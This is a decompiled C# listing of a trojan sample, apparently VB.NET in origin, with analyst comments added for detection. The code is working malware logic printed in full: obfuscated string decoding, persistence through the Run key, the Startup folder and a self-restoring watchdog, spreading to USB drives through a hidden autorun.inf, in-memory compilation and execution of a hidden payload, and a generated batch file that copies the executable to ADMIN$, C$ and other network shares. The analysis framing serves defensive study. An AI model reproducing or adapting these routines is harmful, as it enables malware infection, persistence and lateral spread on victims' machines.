// Decompiled with JetBrains decompiler
// Type: YUGFYLIGvlfiyl
// Assembly: windefender_upd-2, Version=1.3.2.4, Culture=neutral, PublicKeyToken=null
// MVID: 586226ED-1F78-4585-B234-14A26CF968DE
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-PSW.Win32.Dybalom.gwl-55ca18d19b2d75973541e883e8010d88e1f774533692f9ffc976ac7a227ca560.exe
//
// ANALYST NOTES (added during review; the code below is unchanged decompiler output):
//  - The sample file name labels this as Trojan-PSW.Win32.Dybalom.gwl; this listing is for
//    analysis and detection only.
//  - The Microsoft.VisualBasic helpers (ProjectData, Conversions, Operators, NewLateBinding)
//    suggest the original was VB.NET. The label/goto/switch scaffolding in several methods is
//    the decompiler's rendering of its error handling, so control flow should be confirmed
//    against the IL before relying on it.
//  - Behaviours visible in this class: obfuscated string decoding, a registry value plus file
//    copies for persistence, copying to removable drives with an autorun.inf, a batch file that
//    copies a file to network shares, and in-memory compilation of source held in a resource.
//  - Host artefacts named in the code: erPCyQY.exe, autorun.inf, C:\LcvHEwb.bat, log.txt,
//    debug.exe, and a registry value named "Win32".
//  - Decoded strings quoted in comments were worked out by hand from HqBHDPguDENkfJL and should
//    be re-verified in a sandbox before being used as indicators.
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using Microsoft.Win32;
using My;
using System;
using System.CodeDom.Compiler;
using System.Diagnostics;
using System.IO;
using System.Net;
using System.Reflection;
using System.Resources;
using System.Threading;
using System.Windows.Forms;

public class YUGFYLIGvlfiyl
{
    // Populated by CC() with decoded strings: the CodeDom language name, two referenced
    // assembly names and the compiler option string.
    private static string urPkJBxJaoKxHfa;
    private static string DFlGLTJoxxwCYfm;
    private static string RedtwzrQfYIqsNp;
    private static string uIFnBaaCKWySxWn;

    [DebuggerNonUserCode]
    public YUGFYLIGvlfiyl()
    {
    }

    // String decoder used for every obfuscated literal in this class.
    // The last character of the first argument is a per-string offset; each output character is
    // (input char - offset - key char), with the key (second argument) repeating.
    // The result is one character shorter than the input.
    public static string HqBHDPguDENkfJL(string JEhjQWpxnTOONSD, string KRhIIXNQIgKomUJ)
    {
        char[] charArray1 = JEhjQWpxnTOONSD.ToCharArray();
        char[] charArray2 = KRhIIXNQIgKomUJ.ToCharArray();
        char[] chArray = new char[JEhjQWpxnTOONSD.Length - 2 + 1];
        // The trailing character is read as the offset, then overwritten; the overwritten slot is
        // never read again because the loop body is guarded by index2 < Length - 1.
        int num1 = (int) charArray1[JEhjQWpxnTOONSD.Length - 1];
        charArray1[JEhjQWpxnTOONSD.Length - 1] = char.MinValue;
        int index1 = 0;
        int num2 = JEhjQWpxnTOONSD.Length - 1;
        for (int index2 = 0; index2 <= num2; ++index2)
        {
            if (index2 < JEhjQWpxnTOONSD.Length - 1)
            {
                // Wrap the key index so the key repeats.
                if (index1 >= charArray2.Length)
                    index1 = 0;
                int num3 = (int) charArray1[index2];
                int num4 = (int) charArray2[index1];
                int num5 = num3 - num1 - num4;
                chArray[index2] = Convert.ToChar(num5);
                ++index1;
            }
        }
        return new string(chArray);
    }

    // Persistence watchdog; Main starts it on its own thread.
    // Every 5000 ms it checks for a copy of the running executable (same file name) under the
    // ApplicationData folder. If the copy is missing, it re-creates it and re-writes the registry
    // value via gjbzPIrZcwZdrCX. All exceptions are swallowed and the loop never exits.
    // Defender note: a deleted file and registry value will reappear while this process is alive,
    // so the process must be terminated before cleanup.
    public static void CiMbIOhpfLGHFKu()
    {
        string str = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\" + Path.GetFileName(Application.ExecutablePath);
        while (true)
        {
            try
            {
                if (!System.IO.File.Exists(str))
                {
                    System.IO.File.Copy(Application.ExecutablePath, str);
                    YUGFYLIGvlfiyl.gjbzPIrZcwZdrCX(Path.GetFileName(Application.ExecutablePath), str);
                }
            }
            catch (Exception ex)
            {
                ProjectData.SetProjectError(ex);
                ProjectData.ClearProjectError();
            }
            Thread.Sleep(5000);
        }
    }

    // Opens a subkey of HKEY_CURRENT_USER for writing and sets a string value Name = Path.
    // The obfuscated subkey decodes to "Software\Microsoft\Windows\CurrentVersion\Run", i.e. a
    // per-user autostart entry.
    public static void gjbzPIrZcwZdrCX(string Name, string Path) => Registry.CurrentUser.OpenSubKey(YUGFYLIGvlfiyl.HqBHDPguDENkfJL("ŚŧŴŮƗƆƌƀŗŧƑŝƙśƝźŭŬŪőƉƓžƊŲƍƄĽƜŞƜŰŵŬŤşƒƘƃƊũŶźůƕ´", "SDZFlqfgGftFs8vW"), true).SetValue(Name, (object) Path, RegistryValueKind.String);

    // Copies the executing assembly to <drive>\erPCyQY.exe and sets the copy's attributes to
    // Hidden. Returns null.
    // num3 records the statement being executed. When a statement throws, the exception filter
    // jumps to label_8, whose switch resumes at the statement after the failing one (num2 + 1).
    // That is the behaviour of a resume-next error handler.
    public static object Spread(string drive)
    {
    label_1:
        int num1;
        object obj1;
        int num2;
        try
        {
            ProjectData.ClearProjectError();
            num1 = -2;
        label_2:
            int num3 = 2;
            string location = Assembly.GetExecutingAssembly().Location;
        label_3:
            num3 = 3;
            System.IO.File.Copy(location, drive + "\\erPCyQY.exe");
        label_4:
            num3 = 4;
            FileInfo fileInfo = new FileInfo(drive + "\\erPCyQY.exe");
        label_5:
            num3 = 5;
            fileInfo.Attributes = FileAttributes.Hidden;
        label_6:
            obj1 = (object) null;
            goto label_13;
        label_8:
            // Error dispatcher: continue with the statement following the one that threw.
            num2 = num3;
            switch (num1 > -2 ? num1 : 1)
            {
                case 1:
                    int num4 = num2 + 1;
                    num2 = 0;
                    switch (num4)
                    {
                        case 1:
                            goto label_1;
                        case 2:
                            goto label_2;
                        case 3:
                            goto label_3;
                        case 4:
                            goto label_4;
                        case 5:
                            goto label_5;
                        case 6:
                            goto label_6;
                        case 7:
                            goto label_13;
                    }
                    break;
            }
        }
        catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
        {
            ProjectData.SetProjectError(ex);
            goto label_8;
        }
        throw ProjectData.CreateProjectError(-2146828237);
    label_13:
        object obj2 = obj1;
        if (num2 == 0)
            return obj2;
        ProjectData.ClearProjectError();
        return obj2;
    }

    // Writes <drive>\autorun.inf containing an [AutoRun] section whose Open entry names
    // erPCyQY.exe, then sets the file's attributes to Hidden. Returns null.
    // Uses the same resume-on-error scaffolding as Spread.
    // Defender note: a hidden autorun.inf beside a hidden erPCyQY.exe at the root of a removable
    // drive is the on-disk trace of this routine.
    public static object SetAutorun(string drive)
    {
    label_1:
        int num1;
        object obj1;
        int num2;
        try
        {
            ProjectData.ClearProjectError();
            num1 = -2;
        label_2:
            int num3 = 2;
            StreamWriter streamWriter = new StreamWriter(drive + "\\autorun.inf");
        label_3:
            num3 = 3;
            streamWriter.WriteLine("[AutoRun]");
        label_4:
            num3 = 4;
            streamWriter.WriteLine("Open = erPCyQY.exe");
        label_5:
            num3 = 5;
            streamWriter.Close();
        label_6:
            num3 = 6;
            FileInfo fileInfo = new FileInfo(drive + "\\autorun.inf");
        label_7:
            num3 = 7;
            fileInfo.Attributes = FileAttributes.Hidden;
        label_8:
            obj1 = (object) null;
            goto label_15;
        label_10:
            // Error dispatcher: continue with the statement following the one that threw.
            num2 = num3;
            switch (num1 > -2 ? num1 : 1)
            {
                case 1:
                    int num4 = num2 + 1;
                    num2 = 0;
                    switch (num4)
                    {
                        case 1:
                            goto label_1;
                        case 2:
                            goto label_2;
                        case 3:
                            goto label_3;
                        case 4:
                            goto label_4;
                        case 5:
                            goto label_5;
                        case 6:
                            goto label_6;
                        case 7:
                            goto label_7;
                        case 8:
                            goto label_8;
                        case 9:
                            goto label_15;
                    }
                    break;
            }
        }
        catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
        {
            ProjectData.SetProjectError(ex);
            goto label_10;
        }
        throw ProjectData.CreateProjectError(-2146828237);
    label_15:
        object obj2 = obj1;
        if (num2 == 0)
            return obj2;
        ProjectData.ClearProjectError();
        return obj2;
    }

    // Polls the drive list: sleeps 1000 ms, enumerates drives, and for each drive that is
    // Removable, ready, and does not already hold \erPCyQY.exe, calls Spread then SetAutorun.
    // When the array is exhausted, control returns to label_2 and the cycle repeats.
    // NOTE(review): as decompiled there is no normal exit from this loop. The only path to
    // label_23 is dispatcher case 16, which needs num3 == 15, and num3 is never set to 15.
    // Main calls this method synchronously, so the statements after that call may never run.
    // Confirm against the IL.
    public static void searchDrives()
    {
    label_1:
        int num1;
        int num2;
        try
        {
        label_2:
            ProjectData.ClearProjectError();
            num1 = -2;
        label_3:
            int num3 = 3;
            Thread.Sleep(1000);
        label_4:
            num3 = 4;
            DriveInfo[] drives = DriveInfo.GetDrives();
        label_5:
            num3 = 5;
            DriveInfo[] driveInfoArray = drives;
            int index = 0;
            goto label_16;
        label_7:
            num3 = 6;
            DriveInfo driveInfo;
            if (driveInfo.DriveType != DriveType.Removable)
                goto label_14;
        label_8:
            num3 = 7;
            if (!driveInfo.IsReady)
                goto label_13;
        label_9:
            num3 = 8;
            // Skip drives that already carry the copy.
            if (System.IO.File.Exists(driveInfo.Name + "\\erPCyQY.exe"))
                goto label_12;
        label_10:
            num3 = 9;
            YUGFYLIGvlfiyl.Spread(driveInfo.Name);
        label_11:
            num3 = 10;
            YUGFYLIGvlfiyl.SetAutorun(driveInfo.Name);
        label_12:
        label_13:
        label_14:
            ++index;
        label_15:
            num3 = 14;
        label_16:
            if (index < driveInfoArray.Length)
            {
                driveInfo = driveInfoArray[index];
                goto label_7;
            }
            else
                goto label_2;
        label_18:
            // Error dispatcher: continue with the statement following the one that threw.
            num2 = num3;
            switch (num1 > -2 ? num1 : 1)
            {
                case 1:
                    int num4 = num2 + 1;
                    num2 = 0;
                    switch (num4)
                    {
                        case 1:
                            goto label_1;
                        case 2:
                        case 15:
                            goto label_2;
                        case 3:
                            goto label_3;
                        case 4:
                            goto label_4;
                        case 5:
                            goto label_5;
                        case 6:
                            goto label_7;
                        case 7:
                            goto label_8;
                        case 8:
                            goto label_9;
                        case 9:
                            goto label_10;
                        case 10:
                            goto label_11;
                        case 11:
                            goto label_12;
                        case 12:
                            goto label_13;
                        case 13:
                            goto label_14;
                        case 14:
                            goto label_15;
                        case 16:
                            goto label_23;
                    }
                    break;
            }
        }
        catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
        {
            ProjectData.SetProjectError(ex);
            goto label_18;
        }
        throw ProjectData.CreateProjectError(-2146828237);
    label_23:
        if (num2 == 0)
            return;
        ProjectData.ClearProjectError();
    }

    // Entry point. In order, as decompiled:
    //  1. Reads configuration and payload blobs from the embedded resource set "H".
    //  2. Builds a target path under ApplicationData, tries to kill a process whose name occurs
    //     in that path, and deletes any existing file there.
    //  3. Writes a transformed resource to that path.
    //  4. Compiles source text from a resource in memory (CC) and invokes MonAMour.R on it with a
    //     second transformed resource and the dropped file's path.
    //  5. Starts the persistence watchdog thread.
    //  6. Attempts a registry write and a copy to %temp%; on failure copies itself to the Startup
    //     folder instead.
    //  7. Calls searchDrives() (see the note on that method about whether it returns).
    //  8. Performs DNS lookups, a further self-copy, and writes and runs C:\LcvHEwb.bat.
    // FHQnUxOuBUcRwss is defined outside this file. Its DbqjTCEYBFTdyMy method takes and returns
    // bytes; presumably it decrypts the payload, but that is not visible here.
    [STAThread]
    public static void Main()
    {
        ResourceManager resourceManager = new ResourceManager("H", Assembly.GetExecutingAssembly());
        // "K4T8F6c" holds a delimited settings string; only fields [2] and [4] are read, at the end.
        string Expression = Conversions.ToString(resourceManager.GetObject("K4T8F6c"));
        FHQnUxOuBUcRwss fhQnUxOuBucRwss = new FHQnUxOuBUcRwss(Conversions.ToString(resourceManager.GetObject("N1HXjA")));
        string[] strArray = Strings.Split(Expression, "SuZz5vnl5M1s6Sra");
        // Decodes to "True"; used as the comparison value for the settings fields.
        string Right = YUGFYLIGvlfiyl.HqBHDPguDENkfJL("śƕšŽ´", "So8dxq7eL5m3PMUH");
        // Drop path: <ApplicationData>\<resource "WggM2">.exe
        string str1 = Conversions.ToString(Operators.ConcatenateObject((object) (Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\"), Operators.AddObject(resourceManager.GetObject("WggM2"), (object) ".exe")));
        try
        {
            // NOTE(review): as decompiled, index is never incremented, so only processes[0] is
            // examined, and label_7 can be reached with process still null. This is probably a
            // decompiler rendering of a loop; confirm in IL.
            Process process = (Process) null;
            Process[] processes = Process.GetProcesses();
            int index = 0;
            if (index < processes.Length)
                goto label_6;
            else
                goto label_7;
        label_3:
            if (System.IO.File.Exists(str1))
            {
                System.IO.File.Delete(str1);
                goto label_9;
            }
            else
                goto label_9;
        label_6:
            process = processes[index];
            if (!str1.Contains(process.ProcessName))
                goto label_3;
        label_7:
            process.Kill();
            goto label_3;
        }
        catch (Exception ex)
        {
            ProjectData.SetProjectError(ex);
            ProjectData.ClearProjectError();
        }
    label_9:
        try
        {
            // Drop the Base64-decoded, transformed resource "UntJ0" at the path built above.
            MyProject.Computer.FileSystem.WriteAllBytes(str1, fhQnUxOuBucRwss.DbqjTCEYBFTdyMy(Convert.FromBase64String(Conversions.ToString(resourceManager.GetObject("UntJ0")))), false);
        }
        catch (Exception ex)
        {
            ProjectData.SetProjectError(ex);
            ProjectData.ClearProjectError();
        }
        // Compile the source text in resource "nerdz" in memory, then call static method "R" on
        // type "MonAMour" with (transformed resource "tZAsD" bytes, dropped file path).
        // What R does with them is defined by the resource, not by this file.
        YUGFYLIGvlfiyl.kXKlIGiQhTXwXic("MonAMour", "R", YUGFYLIGvlfiyl.CC(Conversions.ToString(resourceManager.GetObject("nerdz"))), new object[2]
        {
            (object) fhQnUxOuBucRwss.DbqjTCEYBFTdyMy(Convert.FromBase64String(Conversions.ToString(resourceManager.GetObject("tZAsD")))),
            (object) str1
        });
        new Thread(new ThreadStart(YUGFYLIGvlfiyl.CiMbIOhpfLGHFKu)).Start();
        try
        {
            object environmentVariable = (object) Environment.GetEnvironmentVariable("temp");
            // Same Run-key path as in gjbzPIrZcwZdrCX, but opened with the single-argument
            // OpenSubKey overload, which returns a read-only key. SetValue on a read-only key
            // throws, so as written the "Win32" value is not created here and the catch branch
            // (copy to the Startup folder) runs instead.
            Registry.CurrentUser.OpenSubKey(YUGFYLIGvlfiyl.HqBHDPguDENkfJL("ŚŧŴŮƗƆƌƀŗŧƑŝƙśƝźŭŬŪőƉƓžƊŲƍƄĽƜŞƜŰŵŬŤşƒƘƃƊũŶźůƕ´", "SDZFlqfgGftFs8vW")).SetValue("Win32", Operators.ConcatenateObject(environmentVariable, (object) "\\erPCyQY.exe"));
            System.IO.File.Copy(Application.ExecutablePath, Conversions.ToString(Operators.ConcatenateObject(environmentVariable, (object) "\\erPCyQY.exe")));
        }
        catch (Exception ex)
        {
            ProjectData.SetProjectError(ex);
            // Fallback persistence: copy into the per-user Startup folder.
            System.IO.File.Copy(Application.ExecutablePath, Conversions.ToString(Operators.ConcatenateObject((object) Environment.GetFolderPath(Environment.SpecialFolder.Startup), (object) "\\erPCyQY.exe")));
            ProjectData.ClearProjectError();
        }
        YUGFYLIGvlfiyl.searchDrives();
        // The suffix decodes to "\winlogon.exe". This is the file the batch script below copies;
        // nothing in this class creates it.
        string str2 = MyProject.Computer.FileSystem.SpecialDirectories.CurrentUserApplicationData + YUGFYLIGvlfiyl.HqBHDPguDENkfJL("ţƙŲŮūƐſƌŖĶƒŴţ´", "SnULKmdi4TyHJsgC");
        try
        {
            // Both lookups discard their results. The decoded host name is "workgroup".
            Dns.GetHostAddresses(Dns.GetHostName())[0].ToString();
            Dns.GetHostEntry(YUGFYLIGvlfiyl.HqBHDPguDENkfJL("žŜŝŹŞŴƋƐŭ´", "S97ZCNhgI8QfVduK"));
        }
        catch (Exception ex)
        {
            ProjectData.SetProjectError(ex);
            ProjectData.ClearProjectError();
        }
        try
        {
            // Destination is the same decoded string ("workgroup"), a relative path with no
            // directory or extension.
            System.IO.File.Copy(Application.ExecutablePath, YUGFYLIGvlfiyl.HqBHDPguDENkfJL("žŜŝŹŞŴƋƐŭ´", "S97ZCNhgI8QfVduK"));
        }
        catch (Exception ex)
        {
            ProjectData.SetProjectError(ex);
            ProjectData.ClearProjectError();
        }
        try
        {
            // Builds C:\LcvHEwb.bat line by line through late-bound StreamWriter calls, then runs
            // it with a hidden window. The script lists network hosts into log.txt ("net view")
            // and, inside a loop over %%t, copies str2 as debug.exe to a fixed list of share names
            // on each host.
            // Defender note: detection points are the .bat file at the root of C:, log.txt in the
            // process working directory, and copy attempts to administrative shares that end in
            // \debug.exe.
            object Instance = (object) new StreamWriter("C:\\LcvHEwb.bat");
            // First line decodes to "@echo off & break off".
            NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1]
            {
                (object) YUGFYLIGvlfiyl.HqBHDPguDENkfJL("ŇŪŇŶƒĥŚƊƐĝłħƄƙŒžŲĥœŴƉ´", "SQ0ZoQ7pvIhSns9i")
            }, (string[]) null, (System.Type[]) null, (bool[]) null, true);
            NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1]
            {
                (object) "net view >log.txt"
            }, (string[]) null, (System.Type[]) null, (bool[]) null, true);
            // Decoded text begins with "for"; presumably the loop header that binds %%t to each
            // entry of log.txt and opens the block closed by ")" below. Decode fully to confirm.
            NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1]
            {
                (object) YUGFYLIGvlfiyl.HqBHDPguDENkfJL("ŭƑųōīşĘłĬšļƇƄŁŏƕŶƉįơŴŭġĽūŜļņĶ´", "SnMyHEDiS9hjbmsu")
            }, (string[]) null, (System.Type[]) null, (bool[]) null, true);
            NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1]
            {
                (object) ("copy \"" + str2 + "\" %%t\\debug.exe")
            }, (string[]) null, (System.Type[]) null, (bool[]) null, true);
            NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1]
            {
                (object) ("copy \"" + str2 + "\" %%t\\IPC$\\debug.exe")
            }, (string[]) null, (System.Type[]) null, (bool[]) null, true);
            NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1]
            {
                (object) ("copy \"" + str2 + "\" %%t\\ADMIN$\\debug.exe")
            }, (string[]) null, (System.Type[]) null, (bool[]) null, true);
            NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1]
            {
                (object) ("copy \"" + str2 + "\" %%t\\C$\\debug.exe")
            }, (string[]) null, (System.Type[]) null, (bool[]) null, true);
            NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1]
            {
                (object) ("copy \"" + str2 + "\" %%t\\D$\\debug.exe")
            }, (string[]) null, (System.Type[]) null, (bool[]) null, true);
            NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1]
            {
                (object) ("copy \"" + str2 + "\" %%t\\PRINT$\\debug.exe")
            }, (string[]) null, (System.Type[]) null, (bool[]) null, true);
            NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1]
            {
                (object) ("copy \"" + str2 + "\" %%t\\e$\\debug.exe")
            }, (string[]) null, (System.Type[]) null, (bool[]) null, true);
            NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1]
            {
                (object) ("copy \"" + str2 + "\" %%t\\e$\\shared\\debug.exe")
            }, (string[]) null, (System.Type[]) null, (bool[]) null, true);
            NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1]
            {
                (object) ("copy \"" + str2 + "\" %%t\\d$\\shared\\debug.exe")
            }, (string[]) null, (System.Type[]) null, (bool[]) null, true);
            NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1]
            {
                (object) ("copy \"" + str2 + "\" %%t\\C$\\shared\\debug.exe")
            }, (string[]) null, (System.Type[]) null, (bool[]) null, true);
            NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1]
            {
                (object) ("copy \"" + str2 + "\" shared\\debug.exe")
            }, (string[]) null, (System.Type[]) null, (bool[]) null, true);
            NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1]
            {
                (object) ")"
            }, (string[]) null, (System.Type[]) null, (bool[]) null, true);
            NewLateBinding.LateCall(Instance, (System.Type) null, "Close", new object[0], (string[]) null, (System.Type[]) null, (bool[]) null, true);
            new Process()
            {
                StartInfo = {
                    WindowStyle = ProcessWindowStyle.Hidden,
                    FileName = "C:\\LcvHEwb.bat"
                }
            }.Start();
        }
        catch (Exception ex)
        {
            ProjectData.SetProjectError(ex);
            ProjectData.ClearProjectError();
        }
        // Settings fields [2] and [4] are compared with "True", but both branches are empty in
        // the decompiled output, so the comparisons have no effect here.
        if (Operators.CompareString(strArray[2], Right, false) != 0)
            ;
        if (Operators.CompareString(strArray[4], Right, false) != 0)
            ;
    }

    // Reflection helper: looks up type `Class` in assembly `file`, finds method `Void`, and
    // invokes it as a static method (null target) with `Parameters`. Returns the result converted
    // to bool. Exceptions are swallowed.
    // NOTE(review): `boolean` is returned unassigned on the failure paths; the original
    // presumably yields false there.
    private static bool kXKlIGiQhTXwXic(
        string Class,
        string Void,
        Assembly file,
        object[] Parameters)
    {
        bool boolean;
        try
        {
            System.Type type = file.GetType(Class);
            if ((object) type != null)
            {
                MethodInfo method = type.GetMethod(Void);
                if ((object) method != null)
                {
                    boolean = Conversions.ToBoolean(method.Invoke((object) null, Parameters));
                    goto label_6;
                }
            }
        }
        catch (Exception ex)
        {
            ProjectData.SetProjectError(ex);
            ProjectData.ClearProjectError();
        }
    label_6:
        return boolean;
    }

    // Compiles `Source` with CodeDom into an in-memory, non-executable assembly and returns it.
    // Compiler settings come from obfuscated strings; the first and last were decoded fully, and
    // the two assembly names are inferred from their leading characters and length, so confirm them:
    //   provider language    -> "CSharp"
    //   referenced assembly  -> "System.dll"
    //   referenced assembly  -> begins "System.M", 21 characters; presumably "System.Management.dll"
    //   compiler options     -> "/platform:x86"
    // Defender note: GenerateInMemory is set, but CodeDom compilation normally launches the
    // framework compiler as a child process, so a compiler process spawned by this executable is
    // a behavioural indicator. Verify on the target framework version.
    public static Assembly CC(string Source)
    {
        YUGFYLIGvlfiyl.urPkJBxJaoKxHfa = YUGFYLIGvlfiyl.HqBHDPguDENkfJL("űƖŵƦƶǀÛ", "Sh2jiulGpHtnnVzW");
        YUGFYLIGvlfiyl.DFlGLTJoxxwCYfm = YUGFYLIGvlfiyl.HqBHDPguDENkfJL("ƁƾǃƂƩƱŏƬơƺÛ", "Sju3iiFmZsEiQdJe");
        YUGFYLIGvlfiyl.RedtwzrQfYIqsNp = YUGFYLIGvlfiyl.HqBHDPguDENkfJL("ƁƜƜƜƔǁĺƀųƞƣƆŵƮƍƍƢőƍƔƛÛ", "SHNMTy1X7UgD5fMD");
        YUGFYLIGvlfiyl.uIFnBaaCKWySxWn = YUGFYLIGvlfiyl.HqBHDPguDENkfJL("ĐńŔŒņĬŲũŐğųĞĬ\u008E", "SFZcD8uiUWmXhX8w");
        CompilerParameters options = new CompilerParameters();
        CodeDomProvider provider = CodeDomProvider.CreateProvider(YUGFYLIGvlfiyl.urPkJBxJaoKxHfa);
        options.GenerateExecutable = false;
        options.GenerateInMemory = true;
        options.ReferencedAssemblies.Add(YUGFYLIGvlfiyl.DFlGLTJoxxwCYfm);
        options.ReferencedAssemblies.Add(YUGFYLIGvlfiyl.RedtwzrQfYIqsNp);
        options.CompilerOptions = YUGFYLIGvlfiyl.uIFnBaaCKWySxWn;
        options.TreatWarningsAsErrors = false;
        return provider.CompileAssemblyFromSource(options, Source).CompiledAssembly;
    }
}